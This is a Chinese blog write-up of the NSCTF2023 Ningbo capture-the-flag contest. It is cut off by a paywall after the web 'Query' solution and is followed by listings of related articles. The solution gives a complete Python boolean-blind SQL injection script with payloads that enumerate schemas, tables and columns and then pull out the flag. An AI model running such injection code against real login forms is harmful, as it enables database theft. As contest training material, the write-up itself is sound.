第六届宁波市赛 [NSCTF2023] 部分web+部分misc+部分密码+mobile

最新推荐文章于 2024-11-26 14:57:40 发布
原创 最新推荐文章于 2024-11-26 14:57:40 发布 · 539 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

文章详细介绍了多个CTF挑战的解决方案,包括Web安全中的SQL布尔盲注获取flag,PHP反序列化漏洞利用,以及加密解密问题,如RSA和摩斯密码、维吉尼亚密码的破解。此外,还涉及ZIP压缩包的字典爆破和PDF文档的转换处理。

前言

只有web,misc是我写的,剩下的都是队的师傅写的,我是飞舞,就这样

Web

Query

查看源码有hintlogin.php,然后有显示登录界面

image-20230520153206872

利用万能密码进行登录,有回显
image-20230520153637646

回显是登陆成功利用脚本进行布尔盲注

import requests
import string

url="http://d574c221d2a0f4da.node.nsctf.cn/login.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,999):
    print(i)
    for j in range(32,128):

        # 库名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"

        # 表名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"

        # 列名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"

        s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{
     
     i},1))/**/like/**/{
     
     j},1,0)#"

        data={
   
   
            'username':s,
            'password':1
        }

        r=requests.post(url,data=data)
        if "登录成功" in r.text:
            flag+=chr(j)
            print(flag)
            break

运行脚本得出flag

image-20230520154409436

Deserialization

按f12得到hint

//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST</
最低0.47元/天 解锁文章
2023宁波市第六届网络安全部分wp
m0_58030673的博客
05-20 801
2023宁波市第六届网络安全部分wp
2022宁波市第五届网络安全(训练Misc部分)
weixin_52961098的博客
05-17 7387
Search evidence 在某银行在近的一次项目中,关键数据疑似泄漏。经过某种手段已经把嫌疑锁定在嫌疑人A身上了,但是嫌疑人A的U盘中除了一张图片之外,没有发现任何相关的信息。你能帮助公司找到他泄漏数据的确凿证据吗?Flag格式flag{xxx}. 附件打开 解压密码在注释部分 解压之后用010打开,Flag字符串在右边这一列 FLAG{QohLfitIPtByVxux} Key Evidence 银行近的一次项目中,某个服务器的密钥被泄露,并被经过某种手段已经把嫌疑锁定
NSCTF-部分题目wp
1stPeak's Blog
09-08 2847
文章目录Web-xffWeb-sqlWeb-XXECRYPTO-神算子CRYPTO-Catch_the_pointCRYPTO-dataMISC-docxMISC-BBQMISC-xxencode+uuencode Web-xff 方法一: 方法二: Web-sql 解题思路: (1)dirsearch扫出备份文件 (2)分析文件 分析index.php文件: <?php require("conf/config.php"); if (isset($_REQUEST['id']))
CTF-【NSCTF 2015】WEB11 条件竞争
m0_59162248的博客
12-12 329
CTF-【NSCTF 2015】WEB11 条件竞争
NSCTF web200
weixin_30764883的博客
03-21 111
刚恰完饭,看了道题目,好久没做PHP的了,是个编码的题目 代码审计下,查下函数,意思就是定义了一个函数encode,请别把flag反转然后把反转后的每个字符变成ascii+1再变成字符呗,然后连接起来。最后返回的是base64 编码过后再反转再Rot13编码后的密文:a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws ...
2017nsctf RE
snowleopard_bin的博客
03-17 755
第一次不看任何参考资料的情况下(关键是在网上找writeup也找不到)做出一道逆向题,特此记录直接拖进IDA找到关键字符串Congrs,点进去看函数理解下函数逻辑:v13=10-&gt;循环10次Congras后面的v4应该就是结果要使v14!=0,就要是37行中v9==v12^v8v12的形成过程就是循环i次计算v8可以理解成v4,就是结果v9是byte_6B4270字符串,进去看看是什么好了,...
2022宁波市第五届网络安全(初Misc部分
weixin_52961098的博客
05-17 2301
听说线下决有菠萝包吃? 解题情况:5题解4,一个三血,哆哆嗦嗦进决 BlackAndWhite 打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张 脚本如下 white = open('D:/Users/huawei/Desktop/target/0.png', 'rb').read() black = open('D:/Users/huawei/Desktop/target/1.png', 'rb').read() ​ flag = '' ​ for i in range.
精选资源
MEGA+616+FireFog+Magic+8bit+Misc+-+NeatWolfs+Pack01+v2.2
08-24
《Unity3D中的粒子系统深度解析——以"MEGA+616+FireFog+Magic+8bit+Misc+-+NeatWolfs+Pack01+v2.2"为例》 Unity3D作为一款强大的游戏开发引擎,其内置的粒子系统是创造各种视觉特效的关键工具。"MEGA+616+FireFog+...
NSCTF crypto100
HotWind66的博客
08-23 912
原题链接:http://www.shiyanbar.com/ctf/1766 方法一: kali 中用binwlak打开 之后用foremost分离两张图片 方法二: 用winhex打开可发现jpg文件头信息(FF D8)多次出现,将最后一个头信息到与其最近尾信息(FF D9)的数据拷贝放入一个新文件中, 打开新文件即为flag图,但是这样提取的flag图模
NSCTF 做题笔记
最新发布
2301_81713863的博客
11-26 800
下载附件,是一个pyc文件。转换为py文件。在用vscode打开。分析源码。源码就是进行了异或和数值转换。有一点很坑,凑得中的值要转换为ASCII值否则就是一串乱码。
CTF-【NSCTF 2015】WEB11 条件竞争_nsctf 2015 web
2401_84297193的博客
04-28 434
exit('上传成功,文件地址为:'.$savefile."exit('上传成功,文件地址为:'.$savefile.""."但是系统检测到恶意上传立马又被删了~");exit('上传失败~'."exit(‘上传失败~’.“
NSCTF Code Php
qq_53460654的博客
05-14 237
打开环境 查看源码 发现问题 访问 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v
宁波市第三届网络安全NSCTF)WP
zhwho的博客
07-12 2764
** 写在开头 从简书回来了,入坑简书半年,由于个人原因,简书账号注销了,以后就在优快云上写啦 hhhh ** 前段时间和室友一起参加了这次NSCTF,做的题比较杂,WEBMISC密码,想着这几天会开环境给复现,现在看好像不给开环境,有的题保存下来了,这里先写写思路,有些截图没保存,以后有机会一定补上。 WEB 签到——本地访问 打开环境,印象里是有一句话: 只有本地管理员才能访问,你想越权访问吗? 这就很明显了,当然想越权访问,不然怎么拿flag?而拿flag的条件很明显有两个——1.本地 2.管理
nsctf php version,绿盟杯NSCTF(CCTF)2017 pwn writeup
weixin_33034651的博客
03-21 381
前言比有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main(){alarm(0x1u);setbuf(stdin, 0);setbuf(stdout, 0);setbuf(stderr, 0);puts("[*]Put You...
NSCTF2017-SteinsGate wp
sherlly666的博客
07-22 2619
0x00 前言挺不错的一道题,思路值得学习,所以简单记录下。0x01 恢复文件查看文件头为PK,改后缀名为zip,解压得到三个文件,分别是 flag.enc:加密后的flag encryption:加密算法脚本 一段base64:解码后转二进制文件,查看文件头JFIF,为图片(DivergenceMeter.jpg) 0x02 读加密算法逻辑算法逻辑主要可分为两部分:1.对t0的求解。其中t0的值和
NSCTF-ZJPC-Crypto
weixin_45734980的博客
07-22 550
编码和加密这两个东西, 需要数学基础我没有。还需要脑洞我也没有 :-< ,祝大家玩的开心:-) 1、签到 签到题划划水,盲猜各种编码形式都可以。不过没有“=”可不代表不是base64哦[滑稽] base64解码三次即可获得flag。 2、密码学 一个字母矩阵???可是第一行出现了F…L…A的字样就觉得眼熟。那就每隔两个取出来就好啦。不过取出的时候有一点小技巧:直接抄下来每三个换一行,就像这样 竖着读就能获取flag啦。(感谢二狗同学的提醒) 3、解密 最开始没有txt的时候,二狗同学猜是
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值